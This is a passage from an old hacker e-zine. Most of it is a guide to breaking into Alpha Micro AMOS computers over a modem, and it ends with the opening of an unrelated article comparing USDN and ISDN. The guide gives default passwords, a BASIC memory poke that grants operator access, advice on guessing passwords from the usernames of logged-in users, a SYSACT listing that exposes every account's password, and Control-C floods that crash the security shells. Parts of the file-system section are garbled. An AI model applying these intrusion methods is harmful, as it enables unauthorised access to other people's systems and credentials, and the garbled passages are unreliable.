programs on the system. When you first connect, depending on how the
|
|||
|
|
|||
|
last user left the modem, you may or may not be logged in to a
|
|||
|
|
|||
|
partition. To verify this, type in the LOG command.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.LOG
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The computer will respond in one of two fashions. If it says "Not
|
|||
|
|
|||
|
logged in", then you will have to log to an existing account. If it
|
|||
|
|
|||
|
says "Current login is DSK1:[203,1]", then there is no need to scan
|
|||
|
|
|||
|
for an account right away.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Perhaps the most important thing to do after this is to do a SYSTAT,
|
|||
|
|
|||
|
which will let you know who else is on the system, and what account,
|
|||
|
|
|||
|
program is being run, and other info. Example:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.SYSTAT
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Status of AMOS/L version 1.3D(165) on Friday, November 11, 1988 03:24:54 PM
|
|||
|
|
|||
|
|
|||
|
|
|||
|
JOB1 TRM1 DSK1:201,3 0067732 ^C CONECT 122880 bytes at 4505554
|
|||
|
|
|||
|
JOB2 TRM2 DSK0:1,2 0024984 TI SYSACT 176800 bytes at 4505554
|
|||
|
|
|||
|
JOB3 TRM3 Not logged 0015460 ^C MEMORY 12288 bytes at 3137554
|
|||
|
|
|||
|
MODEM HAYES DSK0:1,4 0037325 SL SYSTAT 67912 bytes at 2179023
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4 jobs allocated on system, 3 jobs in use (3 logged in)
|
|||
|
|
|||
|
Total memory on system is 2048K bytes
|
|||
|
|
|||
|
System uptime is 07:28:19
|
|||
|
|
|||
|
|
|||
|
|
|||
|
DSK0 26402 blocks free DSK1 3578 blocks free
|
|||
|
|
|||
|
4 devices on system, total of 29980 blocks free
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.#
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Here's a quick rundown on what each column means...
|
|||
|
|
|||
|
Col 1: The name of the job
|
|||
|
|
|||
|
Col 2: The terminal to which the job is attached
|
|||
|
|
|||
|
Col 3: The device and account into which the job is logged
|
|||
|
|
|||
|
Col 4: The octal memory address where the JCB is located
|
|||
|
|
|||
|
Col 5: Terminal status of for that job
|
|||
|
|
|||
|
Col 6: Last program run by that job
|
|||
|
|
|||
|
Col 7: Number of bytes (decimal) of memory allocated
|
|||
|
|
|||
|
Col 8: Octal memory address for beginning memory partition
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The rest is self explanatory. The 5th column (terminal status) has
|
|||
|
|
|||
|
numerous codes which need to be given. Here's the abbreviation and what
|
|||
|
|
|||
|
it stands for:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
TI Terminal input wait state
|
|||
|
|
|||
|
TO Terminal output wait state
|
|||
|
|
|||
|
LD Program load state
|
|||
|
|
|||
|
SL Sleep state
|
|||
|
|
|||
|
IO I/O access other than terminal
|
|||
|
|
|||
|
EW External wait state
|
|||
|
|
|||
|
RN Running
|
|||
|
|
|||
|
SP Suspended state
|
|||
|
|
|||
|
SW Semaphore wait
|
|||
|
|
|||
|
^C Control-C
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The SYSTAT program can be used even when you are not logged in, which
|
|||
|
|
|||
|
is a plus if you wish to access an account without knowing the password.
|
|||
|
|
|||
|
There is another program, called STAT, but don't use this. It
|
|||
|
|
|||
|
constantly updates the screen, and will mess you up if you're using a
|
|||
|
|
|||
|
modem.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Before going further, it should be mentioned on how the Alpha Micro
|
|||
|
|
|||
|
computer is structured. On each system, a number of hard drives
|
|||
|
|
|||
|
subdivided into logical units are encountered. These may be named in
|
|||
|
|
|||
|
any fashion by the sysop, following only the limitation of the LU being
|
|||
|
|
|||
|
three letters or less in length. This is then followed by the device
|
|||
|
|
|||
|
number. Sample LU's may look like: DSK0:, DSK1:, WIN0:, HWK3:, etc.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
On each disk is found a grouping of accounts, also known as partitions,
|
|||
|
|
|||
|
or PPN's (project, programmer number). It is in these accounts where
|
|||
|
|
|||
|
you log in to, and execute programs. These are enclosed in square
|
|||
|
|
|||
|
brackets [], to separate them from the disk specification. When used
|
|||
|
|
|||
|
all togther, it looks like this:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
DSK0:[1,2], DSK0:[1,4], WIN3:[100,0], DSK4:[377,7]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
System Commands:
|
|||
|
|
|||
|
------ ---------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
When in doubt, type HELP. This will give you some online information
|
|||
|
|
|||
|
the system you are currently logged in to. Below are a list of some
|
|||
|
|
|||
|
of the more common commands that you can use.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ASCDMP -- displays the data in physical bocks in ASCII form.
|
|||
|
|
|||
|
ATTACH -- connects a job to a terminal.
|
|||
|
|
|||
|
BASIC -- places you in interactive BASIC mode.
|
|||
|
|
|||
|
BATCH -- loads frequently used commands to your memory partition.
|
|||
|
|
|||
|
BAUD -- change the baud rate of your terminal.
|
|||
|
|
|||
|
CAL100 -- allows you to calibrate the clock oscillator.
|
|||
|
|
|||
|
CLEAR -- write zeroes to all free disk blocks.
|
|||
|
|
|||
|
COMPIL -- use this to compile BASIC programs.
|
|||
|
|
|||
|
COPY -- copies one or more files between accounts or disks.
|
|||
|
|
|||
|
CREATE -- creates a random file of specified size (any size!!).
|
|||
|
|
|||
|
CRT610 -- verifies quality of videocasstte backup media.
|
|||
|
|
|||
|
DATE -- returns with current system date.
|
|||
|
|
|||
|
DING -- rings the terminal bell.
|
|||
|
|
|||
|
DIR -- gives a directory listing for specific files or accounts.
|
|||
|
|
|||
|
DIRSEQ -- alphabetizes all current entries in an account.
|
|||
|
|
|||
|
DSKANA -- analyzes the data on a disk, and reports errors.
|
|||
|
|
|||
|
DSKCPY -- copies contents of one disk and places on another disk.
|
|||
|
|
|||
|
DSKDDT -- allows you to examine and change data directly on disk.
|
|||
|
|
|||
|
DSKPAK -- packs the blocks in use to create area of free blocks.
|
|||
|
|
|||
|
DUMP -- display file contents & memory to the screen.
|
|||
|
|
|||
|
ERASE -- deletes one or more files from disk.
|
|||
|
|
|||
|
ERSATZ -- displays the currently defined ersatz names.
|
|||
|
|
|||
|
FIX -- disassemble assembler (.LIT) code.
|
|||
|
|
|||
|
FORCE -- allows you to send terminal input to another job.
|
|||
|
|
|||
|
HELP -- displays all available help files for the system.
|
|||
|
|
|||
|
JOBALC -- displays your job name.
|
|||
|
|
|||
|
JOBPRI -- determine your job priority, and change other's priority.
|
|||
|
|
|||
|
JOBS -- shows all jobs on system, and how many are in use.
|
|||
|
|
|||
|
KILL -- kill the program being run by another job, or a single job.
|
|||
|
|
|||
|
LNKLIT -- creates ML programs by linking object code files.
|
|||
|
|
|||
|
LOAD -- loads disk files into your memory partition as mem modules.
|
|||
|
|
|||
|
LOG -- logs you into an account so you can access the files there.
|
|||
|
|
|||
|
LOGOFF -- logs you out of the account you were logged into.
|
|||
|
|
|||
|
MAKE -- creates the first record of a SEQ file (make a bogus file).
|
|||
|
|
|||
|
MEMORY -- allocates memory to your job (e.g. .MEMORY 64K).
|
|||
|
|
|||
|
MONTST -- tests the system monitor by bringing up the system new.
|
|||
|
|
|||
|
MOUNT -- see which disks are on the system. Do a /U to unmount a disk.
|
|||
|
|
|||
|
M68 -- assemble an assembler program to an unlinnked ML file.
|
|||
|
|
|||
|
PASS -- allows you to change your account password.
|
|||
|
|
|||
|
PPN -- displays a list of all accounts on a logical device (eg DSK0:).
|
|||
|
|
|||
|
PRINT -- send one or more files to a printer.
|
|||
|
|
|||
|
QDT -- allows you to examine and modify locations in memory.
|
|||
|
|
|||
|
REBOOT -- reboots the system after hitting RETURN.
|
|||
|
|
|||
|
REDALL -- diagnostic test that looks at disk & reports read errors.
|
|||
|
|
|||
|
RENAME -- rename files in an account from one name to another.
|
|||
|
|
|||
|
RUN -- runs a compiled BASIC program.
|
|||
|
|
|||
|
SAVE -- save memory modules as disk files.
|
|||
|
|
|||
|
SEND -- send messages to other terminals on the system.
|
|||
|
|
|||
|
SET -- set terminal handling options for your terminal.
|
|||
|
|
|||
|
SLEEP -- put your job to "sleep" for a period of time.
|
|||
|
|
|||
|
SORT -- alphabetically & numerically sort data in a SEQ file.
|
|||
|
|
|||
|
STAT -- displays & continually updates status of all system jobs.
|
|||
|
|
|||
|
SUBMIT -- used to enter, change, or delete files from task manager.
|
|||
|
|
|||
|
SYSACT -- used to change account passwords, or initialize a disk.
|
|||
|
|
|||
|
SYSTAT -- mentioned above.
|
|||
|
|
|||
|
TIME -- displays or sets the time of day.
|
|||
|
|
|||
|
TRMDEF -- gives information about the system terminals.
|
|||
|
|
|||
|
TYPE -- displays a text file to the screen (use the /P switch).
|
|||
|
|
|||
|
VCRRES -- read files from videocassette to disk.
|
|||
|
|
|||
|
VCRSAV -- save files from disk to videocassette.
|
|||
|
|
|||
|
VER -- gives you version of current operating system level.
|
|||
|
|
|||
|
VUE -- create and enter text editor. Use ESCape to toggle modes.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
You have to be careful with how the programs are used. If done
|
|||
|
|
|||
|
inappropriately, you could do major damage to the computer. Many of
|
|||
|
|
|||
|
the above programs can only be executed from the operator account
|
|||
|
|
|||
|
DSK0:[1,2].
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Entering via BASIC:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
There is a back door in the version of BASIC that comes bundled with
|
|||
|
|
|||
|
AMOS. Depending on the type of security present, you can gain access
|
|||
|
|
|||
|
to the system operator account (DSK0:[1,2]), which gives you the power
|
|||
|
|
|||
|
to do quite a few things. What the command essentially does is poke
|
|||
|
|
|||
|
into memory the appropriate values to give you sysop access.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Type this in at the dot prompt (.) :
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.BASIC
|
|||
|
|
|||
|
|
|||
|
|
|||
|
AlphaBASIC Version 1.3 (217)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
READY
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Once inside BASIC, type in this command as seen below; it doesn't
|
|||
|
|
|||
|
matter if you use upper or lower case.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
WORD(WORD(1072)+20)=258
|
|||
|
|
|||
|
|
|||
|
|
|||
|
BYE
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.#
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The BYE command exits you out of BASIC and puts you back at the
|
|||
|
|
|||
|
OS level. You can also rename files and open files via BASIC.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Depending on the security in the system, if you typed in everything
|
|||
|
|
|||
|
as above, you should be logged into DSK0:[1,2], also known as OPR:.
|
|||
|
|
|||
|
This is the system operator's account, from which all types of
|
|||
|
|
|||
|
commands can be issued.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|||
|
|
|||
|
|
|||
|
|
|||
|
When you finally get connected to the system, you need some place to log
|
|||
|
|
|||
|
in to. There are certain default accounts on every system. These are:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
OPR: --> DSK0:[1,2] SYS: --> DSK0:[1,4]
|
|||
|
|
|||
|
DVR: --> DSK0:[1,6] CMD: --> DSK0:[2,2]
|
|||
|
|
|||
|
LIB: --> DSK0:[7,0] HLP: --> DSK0:[7,1]
|
|||
|
|
|||
|
BOX: --> DSK0:[7,2] BAS: --> DSK0:[7,6]
|
|||
|
|
|||
|
MAC: --> DSK0:[7,7]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
While logging around to the different accounts, some will have defined
|
|||
|
|
|||
|
"ersatz" names. This means that besides the [p,pn] specification, you can
|
|||
|
|
|||
|
access that account with a defined name. In the above examples, logging
|
|||
|
|
|||
|
into SYS: is the same as logging into DSK0:[1,4].
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
As mentioned previously, older models of the Alpha Micro did not have any
|
|||
|
|
|||
|
security built in to them. Later versions of the operating have changed
|
|||
|
|
|||
|
this, though. Once you get connected and you try to log into an account,
|
|||
|
|
|||
|
you may be asked for a password. The word you type is not echoed on your
|
|||
|
|
|||
|
screen. Two default passwords that you can try for logging purposes are
|
|||
|
|
|||
|
"DEMO" and "SYSTEM SERVICE". These are not case-sensitive, so you can
|
|||
|
|
|||
|
type them in either upper or lower case. If neither of these work (which
|
|||
|
|
|||
|
is unlikely, since people are too lazy to change them), try running the
|
|||
|
|
|||
|
SYSTAT command.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
What happens is that you will often see people logged in under a short
|
|||
|
|
|||
|
(6 digits or less) user name, such as JOHN, AMY, SUSAN, etc. Try logging
|
|||
|
|
|||
|
in with one of these as your PW. 80 per cent of the time it will work.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
If you've gotten into the system this far, then good. There are lots
|
|||
|
|
|||
|
of things to do or access. If you're looking around for information,
|
|||
|
|
|||
|
these are contained in files that end in a .TXT extension. These may be
|
|||
|
|
|||
|
examined by using the TYPE command from AMOS. The syntax would be:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.TYPE MODEM.TXT/P
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The /P is not required, but is useful, because otherwise the file would be
|
|||
|
|
|||
|
diaplayed too quickly for you to look at. The /P switch displays the
|
|||
|
|
|||
|
contents one page at a time. Pressing <RET> will scroll through the text.
|
|||
|
|
|||
|
One word of warning: Don't use the TYPE command on .LIT, .SBR, or .OBJ
|
|||
|
|
|||
|
files; doing so will usually result in your terminal being locked up,
|
|||
|
|
|||
|
effectively ending your session.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Now let's say you wanted to check out the files that are in other accounts.
|
|||
|
|
|||
|
Usually all that is needed is to simply log there. However, certain
|
|||
|
|
|||
|
accounts will be passworded. There is no simple way to just dump the
|
|||
|
|
|||
|
contents of a disk block and see what the PW is. There are alternatives,
|
|||
|
|
|||
|
however. One method is to log into the operator account (DSK0:[1,2]) and
|
|||
|
|
|||
|
use the SYSACT command. This lets you to various things to the disk, but
|
|||
|
|
|||
|
the one you would be concerned about lists all of the accounts on a parti-
|
|||
|
|
|||
|
cular disk. The command works like this:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.#
|
|||
|
|
|||
|
.SYSACT DSK0:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Use the "H" to get a listing of all the available commands from within
|
|||
|
|
|||
|
SYSACT.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
*
|
|||
|
|
|||
|
*h
|
|||
|
|
|||
|
Implemented commands are:
|
|||
|
|
|||
|
A PPN - Add a new account
|
|||
|
|
|||
|
C PPN - Change password of an account
|
|||
|
|
|||
|
D PPN - Delete an account
|
|||
|
|
|||
|
E - Rewrite MFD and exit to monitor
|
|||
|
|
|||
|
H - Help (Print instructions)
|
|||
|
|
|||
|
I - Initialize entire disk
|
|||
|
|
|||
|
L - List current accounts
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The last one "L" is the one we're concerned with. Press <RET> after it to
|
|||
|
|
|||
|
see a listing of all the accounts on the disk. Passwords (if any) will be
|
|||
|
|
|||
|
displayed to the right. The "C" option will allow you to change the PW on
|
|||
|
|
|||
|
an individual account. Then press "E" to go back to the command level.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
If you want to check out a file a little less elegantly, this may be done
|
|||
|
|
|||
|
by simply copying the file to an unpassworded account or by typing the
|
|||
|
|
|||
|
file from another account.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Account and file structure:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
As explained before, there are accounts on the disk, which may or may not
|
|||
|
|
|||
|
contain files in them. AMOS maintains this account structure on the disk.
|
|||
|
|
|||
|
In fact, a listing of which files belong in what account are kept track of
|
|||
|
|
|||
|
in the account directory.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
There are two types of files that are possible on the Alpha Micro:
|
|||
|
|
|||
|
sequential (linked) and random (contiguous) files. Each block is 512 bytes
|
|||
|
|
|||
|
in length, which may or may not be filled up totally. Files may not overlap
|
|||
|
|
|||
|
onto another disk, and each disk block has a unique number by which it is
|
|||
|
|
|||
|
referenced to via AMOS.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The format of most Alpha files are sequential -- AMOS reads in each disk
|
|||
|
|
|||
|
block of the file, which tells it the disk address of the next disk block.
|
|||
|
|
|||
|
The key point is that to access one block of data, you have to access all
|
|||
|
|
|||
|
preceding blocks.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
When AMOS writes a sequential file to the disk, it looks for the first free
|
|||
|
|
|||
|
disk block. It writes a copy of the first file block into that disk
|
|||
|
|
|||
|
location. Next, it looks for another free disk block. This next disk block
|
|||
|
|
|||
|
may or may not be anywhere near the first block used. This process goes on
|
|||
|
|
|||
|
until the entire file is transferred to the disk. The disk blocks that make
|
|||
|
|
|||
|
up the file may be scattered across the disk. Each disk block in the file
|
|||
|
|
|||
|
contains a portion of the file; it also contains the address of the next
|
|||
|
|
|||
|
disk block used by the file.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
*-----------*-----------*
|
|||
|
|
|||
|
| Address of| Data in |
|
|||
|
|
|||
|
| next block| file block|
|
|||
|
|
|||
|
*-----------*-----------*
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Sequential files are also called linked files because the disk blocks are
|
|||
|
|
|||
|
linked together by the information in each block that points to the address
|
|||
|
|
|||
|
of the next disk block. The last block in the file is designated as such
|
|||
|
|
|||
|
by a link of zero. It looks like this:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/---\
|
|||
|
|
|||
|
/----------------\ /----------------\ ! |
|
|||
|
|
|||
|
! ! ! ! ! X
|
|||
|
|
|||
|
*-----------*--------* ! *-----------*--------* ! *----------*-------*
|
|||
|
|
|||
|
| Address of| DATA | ->| Address of| DATA | !->| EOF | DATA |
|
|||
|
|
|||
|
| next block| | | next block| | | Zero link| |
|
|||
|
|
|||
|
*-----------*--------* *-----------*--------* *----------*-------*
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Random files differ from their sequential counterparts because the data in
|
|||
|
|
|||
|
them can be accessed randomly. AMOS knows how long the files are, and also
|
|||
|
|
|||
|
knows exactly where the files begin on the disk. The operating system can
|
|||
|
|
|||
|
therefore access any block in a file by computing an offset value from the
|
|||
|
|
|||
|
front of the file, and then reading the proper disk location. The distinc-
|
|||
|
|
|||
|
tion between random and sequential is that since the disk blocks don't have
|
|||
|
|
|||
|
to be accessed in any particular order, AMOS can locate specific data in a
|
|||
|
|
|||
|
file quicker.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
When a random file is written to disk, the first free groups of contiguous
|
|||
|
|
|||
|
blocks are searched for which are large enough to hold the entire file. If
|
|||
|
|
|||
|
there aren't enough blocks on the disk, the message "Disk full" appears.
|
|||
|
|
|||
|
Random files look something like this:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
*---------------*---------------*---------------*---------------*
|
|||
|
|
|||
|
| File block #1 | File block #2 | File block #3 | File block #4 |
|
|||
|
|
|||
|
*---------------*---------------*---------------*---------------*
|
|||
|
|
|||
|
|
|||
|
|
|||
|
One a random file is allocated on the disk, it is not possible to expand it.
|
|||
|
|
|||
|
Random files are used mainly for applications where the file length remains
|
|||
|
|
|||
|
constant.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The first block on a disk (block 0) is the disk ID block. Alpha Micros use
|
|||
|
|
|||
|
this disk block to maintain permanent identification information about the
|
|||
|
|
|||
|
disk. The next block (block 1) is the Master File Directory (MFD). At
|
|||
|
|
|||
|
block 2 lies the disk bitmap. The bitmap is the structure that keeps track
|
|||
|
|
|||
|
of which blocks on the disk are in use, and which are available. The
|
|||
|
|
|||
|
bitmap contains one bit for each block on the disk. If a block is in use,
|
|||
|
|
|||
|
the bit in the bitmap that represents that disk block is a 1; if the block
|
|||
|
|
|||
|
is available for use, its bit in the bitmap is a 0. The bitmap is perma-
|
|||
|
|
|||
|
nently stored on the disk beginning with block 2 and extending as far as
|
|||
|
|
|||
|
necessary. The last two words in te bitmap form a hash total. If some
|
|||
|
|
|||
|
data in the bitmap becomes destroyed, then there is a chance that data
|
|||
|
|
|||
|
corruption has occurred. The ocre for writing data to the disk is:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
[1] Find in memory a copy of the bitp of the disk to be accessedd.
|
|||
|
|
|||
|
[2] Computer the hash total of the bitmap & check agains the sh.
|
|||
|
|
|||
|
[3] Consult bitmap to see the next free block.
|
|||
|
|
|||
|
[4] Change bitmap to shockthe block is in use.
|
|||
|
|
|||
|
[5] Recompute bitmap hash to reflect the modified bmap.
|
|||
|
|
|||
|
[6] Write modified bitmap back out to the disk.
|
|||
|
|
|||
|
[7] Write thata to the chosen block.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Every disk contains one Master File Directory (MF Each disk contains
|
|||
|
|
|||
|
one MFD. The MFD is one block long, and contains e entry of four words
|
|||
|
|
|||
|
for each user account allocated on that disk. This ps the limitation
|
|||
|
|
|||
|
of having a maximum of 63 user accounts per disk.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Each try in the MFD identifies a specific acct directory. Individual
|
|||
|
|
|||
|
account dectories are known as User File Directories (UFDs). The entry
|
|||
|
|
|||
|
contains thccount PPN, number of the first block used by the UFD, and
|
|||
|
|
|||
|
a password assned (if any). The MFD contains one entry for every UFD
|
|||
|
|
|||
|
on the disk.One UFD exists for each user account; it contains one entry
|
|||
|
|
|||
|
for eachlein that account. These contain various sorts of information
|
|||
|
|
|||
|
relating tthe file. A UFD may consist of more than one disk block; if
|
|||
|
|
|||
|
it is larger than oblock, the first word of the FD is nzero and gives the link
|
|||
|
|
|||
|
to the next UFD bock.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Since the existing security the Alpha Micro is lax, third party
|
|||
|
|
|||
|
comiehave wriiten their own sceurity systems, making it considerably
|
|||
|
|
|||
|
more dicult to access a system. However, all is not lost. There are a
|
|||
|
|
|||
|
few wato make things easier.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Default passwords are the first step. One of the security systems, known
|
|||
|
|
|||
|
as TSASS, has the default passwords of MAL, MAL, MAL for its prompts. You
|
|||
|
|
|||
|
will know that you've encounted an Alpha Micro running TSASS by the
|
|||
|
|
|||
|
message: "Welcome to a Time Shar and Security System". Another security
|
|||
|
|
|||
|
package, UltraSafe, has the dult PW's of OPR, OPR, OPR. An UltraSafe
|
|||
|
|
|||
|
system is harder to recognize because the prompts can be changed, although
|
|||
|
|
|||
|
some more common ones ask for NAME, PORD, and GROUP.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The next option is if you have found a password that lets you in, it may be
|
|||
|
|
|||
|
one of low security. This can automatically chain you into a menu or shell
|
|||
|
|
|||
|
program. Depending onw the system is configure, a string of Control C'or any
|
|||
|
|
|||
|
other key sequence) can mess up the buffer, automatically causing
|
|||
|
|
|||
|
e curity system to crash, and bringing you to AMOS, without being
|
|||
|
|
|||
|
confined to the security program. The input must be typed in rapidly, or
|
|||
|
|
|||
|
it won't work. This method works for both TSASS and UltraSafe.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Note: This file is written for informational purposes oy, to give
|
|||
|
|
|||
|
you an idea of the workings of computer security for the Al Micro
|
|||
|
|
|||
|
Operating System (AMOS). If you want more information on the inner workings of
|
|||
|
|
|||
|
this operating system, then get in touch with me.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Nightcrawler out!
|
|||
|
|
|||
|
===============================================================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
|||
|
|
|||
|
$ P/HUN Issue #4 $
|
|||
|
|
|||
|
$ Volume 2: Phile 9 of 11 $
|
|||
|
|
|||
|
$ $
|
|||
|
|
|||
|
$ $
|
|||
|
|
|||
|
$ USDN VERSUS ISDN $
|
|||
|
|
|||
|
$ ---------------- $
|
|||
|
|
|||
|
$ $
|
|||
|
|
|||
|
$ by $
|
|||
|
|
|||
|
$ $
|
|||
|
|
|||
|
$ $
|
|||
|
|
|||
|
$ LORD MICRO $
|
|||
|
|
|||
|
$ ********** $
|
|||
|
|
|||
|
$ $
|
|||
|
|
|||
|
$ TOLL CENTER BBS - (718)-358-9209 $
|
|||
|
|
|||
|
$ A 2600 MAGAZINE BBS $
|
|||
|
|
|||
|
$ $
|
|||
|
|
|||
|
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
PREFACE: The integrated services digital network (ISDN) is a long-range
|
|||
|
|
|||
|
plan for systematically upgrading the televommunications networks of various
|
|||
|
|
|||
|
countries to provide both voice and data services on a single physical network.
|
|||
|
|
|||
|
European countries have been the major force behind degining ISDN. The U.S.
|
|||
|
|
|||
|
however, will require a variant of ISDN, because its communications
|
|||
|
|
|||
|
industry operates in a competitive user-oriented environment. This article
|
|||
|
|
|||
|
describes the differences in implementation and services that can be expected
|
|||
|
|
|||
|
with USDN (the U.S. version of ISDN) and identifies unresolved issues that
|
|||
|
|
|||
|
should concern the data communications manager.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
INTRODUCTION
|
|||
|
|
|||
|
------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The ISDN proposal has recieved worldwide attention for at least a decade.
|
|||
|
|
|||
|
Constrained by an apathetic marketplace, technical limitations, economic
|
|||
|
|
|||
|
considerations, and the slow pace involved in establishing acceptable
|
|||
|
|
|||
|
world-wide standards, implementation of ISDN has occured principally in
|
|||
|
|
|||
|
laboratories only.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The International Telegraph and Telephone Consultative Committee (CCITT)
|
|||
|
|
|||
|
has attempted to define and obtain general consesus regarding ISDN
|
|||
|
|
|||
|
objectives, interfaces, services, and standards. The CCITT-backed ISDN
|
|||
|
|
|||
|
principally represents European interests. Although the U.S. is repre-
|
|||
|
|
|||
|
sented in the CCITT and offers support for its programs, the major
|
|||
|
|
|||
|
telecommunications organizations in the U.S. are more interested in estab-
|
|||
|
|
|||
|
lishing their own standards and programs. So, while ISDN seems to be
|
|||
|
|
|||
|
gaining more U.S. support, it continues to reflect a European perspective.
|
|||
|
|
|||
|
Recently, the term USDN has been used to distinguish the modifications to
|
|||
|
|
|||
|
ISDN that are expected to evolve in the U.S. The USDN concept is one of
|
|||
|
|
|||
|
integrated access to multiple networks, rather than the integrated services
|
|||
|
|
|||
|
on one network approach of the ISDN proposal.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The U.S. telecommunications industry has long recognized that ISDN would
|
|||
|
|
|||
|
have a somewhat modified personality in the U.S. Several industry-wide
|
|||
|
|
|||
|
ISDN conferences addressed the U.S. equivalent to ISDN, but none of the
|
|||
|
|
|||
|
conference comittees proposed that the U.S. adopt ISDN totally, be-
|
|||
|
|
|||
|
cause of the unique characteristics of the U.S. communications environment.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
THE U.S. COMMUNICATIONS ENVIRONMENT
|
|||
|
|
|||
|
-----------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The unique U.S. communications industry characteristics that influence
|
|||
|
|
|||
|
the USDN effort are described in the following section. These characteristics
|
|||
|
|
|||
|
are summerized in Table 1, which compares the U.S. communications environment
|
|||
|
|
|||
|
with the environment in other countries.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The Competitive Marketplace: In the U.S., the privately managed telephone
|
|||
|
|
|||
|
industry responds, rapidly to user demands for new services. In most other
|
|||
|
|
|||
|
countries, however, services are established in a slow, deliberate program
|
|||
|
|
|||
|
by one government-administrated source, usually the country's postal,
|
|||
|
|
|||
|
telephone, and telegraph (PTT) agency. The users then decide if and how
|
|||
|
|
|||
|
they will use the services offered.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Technology Advances: Second only to the competitive marketplace, technology
|
|||
|
|
|||
|
advances include component developments such as as memory devices, VLSI
|
|||
|
|
|||
|
chip design, and optical elements. Developments in the system architecture,
|
|||
|
|
|||
|
networking, and functional interfaces in transmission and switching
|
|||
|
|
|||
|
technologies are equally important in defining the USDN concept.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Less Restrictive National Standards: Because standards imply conformity,
|
|||
|
|
|||
|
they can restrain innovation. Because they are not required to undergo a
|
|||
|
|
|||
|
lengthy standards-approval cycle, U.S. manufacturers are free to produce
|
|||
|
|
|||
|
systems that are incompatible with existing equipment. De facto standards
|
|||
|
|
|||
|
are often established by the market's acceptance of a particular system.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Comparing ISDN and USDN
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FEATURES CLASSICAL ISDN USDN ENVIRONMENT
|
|||
|
|
|||
|
ENVIRONMENT
|
|||
|
|
|||
|
-------- -------------- ----------------
|
|||
